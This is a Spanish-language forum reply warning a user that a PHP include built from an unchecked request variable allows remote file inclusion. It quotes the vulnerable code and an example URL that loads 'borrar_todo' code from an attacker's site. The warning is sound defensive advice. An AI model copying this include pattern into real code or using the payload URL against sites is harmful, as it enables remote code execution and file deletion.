Siento que me estoy volviendo un poco latoso porque ya lo dije un par de veces hoy, pero hacer un include de esa manera es MUY inseguro.
Código PHP:
if ( !isset( $option ) )
{
$option="portada";
}
include "$option.php";
Cualquiera podría poner en la barra de direcciones del navegador 'www.tusitio.com/index.php?option=http://www.sitio_tal.com/borrar_todo y el resultado de tu include sería:
include "http://www.sitio_tal.com/borrar_todo.php";
Estarías EJECUTANDO en tu sitio el código php borrar_todo que está en el sitio de un eventual atacante que, en muchas de las configuraciones de php, sólo necesita un línea de código para borrarte todos los archivos que haya en tu sitio. O para hacer lo que le de la gana al que quiera atacar tu sitio.
Acá explican tangencialmente el problema y cómo evitarlo.
http://www.zonaphp.com/creando-webs-modulares/2/
Creo que es algo para tomar muy en cuenta.
Suerte
Califa